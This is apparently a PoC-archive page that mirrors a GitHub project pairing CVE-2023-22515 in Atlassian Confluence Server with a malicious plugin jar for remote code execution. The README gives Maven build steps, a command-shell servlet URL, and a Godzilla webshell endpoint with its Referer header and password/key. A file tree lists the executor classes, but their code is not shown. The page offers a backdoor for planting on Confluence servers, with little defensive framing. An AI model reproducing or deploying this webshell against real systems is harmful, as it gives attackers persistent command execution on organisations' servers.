Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-22515 PoC — Atlassian Confluence Server 安全漏洞

Source
https://github.com/aaaademo/Confluence-EvilJar
Associated Vulnerability
Title:Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
Description:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server存在安全漏洞,该漏洞源于外部攻击者可能利用可公开访问的Confluence Data Center和Confluence Serve,用未知的漏洞来创建Confluence 管理员帐户并访问 Confluence 实例。
Description
配合 CVE-2023-22515 后台上传jar包实现RCE
Readme

## aaaademo/Confluence-EvilJar

> 配合 CVE-2023-22515 后台上传jar包实现RCE
```bash
git clone https://github.com/aaaademo/Confluence-EvilJar
cd Confluence-EvilJar
mvn package
```

### CMDshell

```
http://confluence.local/plugins/servlet/testbin/cmServlet

```

### 哥斯拉webshell连接方式

```
http://confluence.local/plugins/servlet/testbin/gzServlet

Referer: https://www.baidu.com/

p@ssw0rd / key
```
File Snapshot

 [4.0K]  /data/pocs/2ce468619f147f3e1b2d1f5ecaccd0a0867a89b7
├── [ 310]  LICENSE
├── [2.1K]  pom.xml
├── [ 422]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  demo
        │       ├── [7.2K]  bxExecutor.java
        │       ├── [1.5K]  CommandExecutor.java
        │       └── [6.7K]  gzExecutor.java
        └── [4.0K]  resources
            └── [1.1K]  atlassian-plugin.xml

5 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.